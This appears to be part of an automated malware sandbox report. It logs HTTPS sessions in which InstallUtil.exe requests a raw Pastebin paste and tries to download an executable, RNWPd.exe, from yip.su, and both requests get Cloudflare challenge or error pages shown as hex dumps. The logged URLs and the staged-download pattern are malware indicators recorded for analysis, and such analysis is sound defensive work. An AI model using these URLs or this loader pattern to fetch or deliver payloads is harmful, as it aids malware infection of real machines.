2024-08-11 09:22:37 UTC	1285	IN	HTTP/1.1 403 Forbidden Date: Sun, 11 Aug 2024 09:22:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin Origin-Agent-Cluster: ?1 Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() Referrer-Policy: same-origin X-Content-Options: nosniff X-Frame-Options: SAMEORIGIN cf-mitigated: challenge
2024-08-11 09:22:37 UTC	683	IN	Data Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 38 50 56 4d 72 68 57 77 37 69 76 30 73 36 66 66 78 50 49 73 58 61 41 73 45 52 6c 71 6a 52 77 7a 66 59 31 33 46 5a 6d 43 74 72 64 45 48 68 43 47 50 47 6f 35 63 4d 35 32 35 47 63 7a 57 45 4e 57 46 4d 77 53 53 78 64 55 47 44 4e 4f 58 75 55 47 50 76 52 62 53 2f 4b 38 75 31 53 38 45 79 72 5a 43 49 69 54 57 50 76 48 35 4e 41 3d 24 74 32 36 72 33 6c 6d 70 4b 43 73 47 70 54 39 62 33 32 66 4b 75 41 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20 Data Ascii: cf-chl-out: 8PVMrhWw7iv0s6ffxPIsXaAsERlqjRwzfY13FZmCtrdEHhCGPGo5cM525GczWENWFMwSSxdUGDNOXuUGPvRbS/K8u1S8EyrZCIiTWPvH5NA=$t26r3lmpKCsGpT9b32fKuA==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
2024-08-11 09:22:37 UTC	1369	IN	Data Raw: 33 62 66 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d Data Ascii: 3bfc<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
2024-08-11 09:22:37 UTC	1369	IN	Data Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
2024-08-11 09:22:37 UTC	1369	IN	Data Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
2024-08-11 09:22:37 UTC	1369	IN	Data Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
2024-08-11 09:22:37 UTC	1369	IN	Data Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72 Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
2024-08-11 09:22:37 UTC	1369	IN	Data Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
2024-08-11 09:22:37 UTC	1369	IN	Data Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69 Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
2024-08-11 09:22:37 UTC	1369	IN	Data Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 79 69 70 2e 73 75 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 36 34 36 39 32 27 2c 63 52 61 79 3a 20 27 38 62 31 37 32 39 38 39 65 39 38 34 63 34 35 63 27 2c 63 48 61 73 68 3a 20 27 36 37 37 35 32 65 61 34 37 61 36 33 39 66 64 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 52 4e 57 50 64 2e 65 78 65 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 4d 55 4b 31 4d 5f 50 51 36 6e 56 65 72 76 5a 62 4a 5a 38 53 73 39 74 5a 54 73 4f 73 4f 5a 67 6c 6b 4c 4b 6b 6b 47 57 6f 53 34 45 2d 31 37 32 33 33 36 38 31 35 37 2d 30 2e 30 2e 31 2e 31 2d 33 36 32 35 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 54 69 6d Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "yip.su",cType: 'managed',cNounce: '64692',cRay: '8b172989e984c45c',cHash: '67752ea47a639fd',cUPMDTk: "\/RNWPd.exe?__cf_chl_tk=MUK1M_PQ6nVervZbJZ8Ss9tZTsOsOZglkLKkkGWoS4E-1723368157-0.0.1.1-3625",cFPWv: 'g',cTTim
2024-08-11 09:22:37 UTC	1369	IN	Data Raw: 78 57 54 44 6f 5f 50 37 4c 32 72 45 2e 67 54 34 37 6d 32 56 51 54 46 72 41 46 74 46 4b 69 57 54 4f 31 48 65 68 4f 5f 73 50 67 42 53 4d 74 32 4b 6f 64 4a 64 30 44 4d 6e 62 76 64 5f 36 41 5f 47 68 6d 4e 4a 51 56 4a 70 4b 44 71 41 6c 33 7a 54 62 63 4e 2e 43 69 43 31 2e 5f 6d 32 4f 55 68 51 53 75 7a 4e 63 59 37 35 57 54 48 35 38 39 30 65 39 4e 4d 56 43 6d 35 57 49 66 70 57 52 74 72 38 34 67 31 6b 6a 6b 6b 6f 48 36 50 36 52 42 43 35 44 55 4a 64 77 50 41 37 46 4e 51 35 31 41 4e 71 55 63 56 50 32 39 5a 53 49 61 71 53 32 61 74 73 70 2e 4d 4e 74 55 69 42 33 42 47 55 41 65 32 5a 34 6a 76 48 39 73 51 63 34 73 61 41 35 52 47 39 47 73 38 4d 31 50 4d 75 6f 34 2e 71 41 66 30 76 4c 7a 41 77 56 5a 37 4f 6a 4a 62 4c 78 56 57 79 59 56 41 6e 35 37 4a 71 62 6d 69 33 4c 6a 33 Data Ascii: xWTDo_P7L2rE.gT47m2VQTFrAFtFKiWTO1HehO_sPgBSMt2KodJd0DMnbvd_6A_GhmNJQVJpKDqAl3zTbcN.CiC1._m2OUhQSuzNcY75WTH5890e9NMVCm5WIfpWRtr84g1kjkkoH6P6RBC5DUJdwPA7FNQ51ANqUcVP29ZSIaqS2atsp.MNtUiB3BGUAe2Z4jvH9sQc4saA5RG9Gs8M1PMuo4.qAf0vLzAwVZ7OjJbLxVWyYVAn57Jqbmi3Lj3

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.7	49731	172.67.19.24	443	7628	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-11 09:22:42 UTC	74	OUT	GET /raw/V6VJsrV3 HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-08-11 09:22:42 UTC	222	IN	HTTP/1.1 200 OK Date: Sun, 11 Aug 2024 09:22:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 8b1729a9ce08429d-EWR
2024-08-11 09:22:42 UTC	1147	IN	Data Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-11 09:22:42 UTC	1369	IN	Data Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
2024-08-11 09:22:42 UTC	1369	IN	Data Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
2024-08-11 09:22:42 UTC	529	IN	Data Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
2024-08-11 09:22:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.7	49732	188.114.97.3	443	7628	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-11 09:22:43 UTC	65	OUT	GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive
2024-08-11 09:22:43 UTC	1285	IN	HTTP/1.1 403 Forbidden Date: Sun, 11 Aug 2024 09:22:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin Origin-Agent-Cluster: ?1 Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() Referrer-Policy: same-origin X-Content-Options: nosniff X-Frame-Options: SAMEORIGIN cf-mitigated: challenge
2024-08-11 09:22:43 UTC	679	IN	Data Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 78 47 78 37 31 44 77 50 6c 64 49 43 38 4c 39 49 51 33 65 66 6c 77 76 55 6b 6f 75 46 66 5a 37 43 46 38 75 46 63 55 49 4c 67 73 68 76 51 67 42 43 57 53 63 4c 50 38 63 45 75 43 58 4f 30 56 42 62 6d 37 67 4b 37 4c 46 79 7a 67 74 7a 62 79 30 62 38 66 74 44 34 2f 4b 6a 6c 5a 37 78 43 78 6a 6d 2f 36 55 55 49 4d 54 50 57 36 55 3d 24 47 52 69 61 78 78 53 42 35 46 77 31 2f 78 66 41 73 58 68 51 41 77 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20 Data Ascii: cf-chl-out: xGx71DwPldIC8L9IQ3eflwvUkouFfZ7CF8uFcUILgshvQgBCWScLP8cEuCXO0VBbm7gK7LFyzgtzby0b8ftD4/KjlZ7xCxjm/6UUIMTPW6U=$GRiaxxSB5Fw1/xfAsXhQAw==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
2024-08-11 09:22:43 UTC	1369	IN	Data Raw: 33 62 66 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d Data Ascii: 3bfc<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
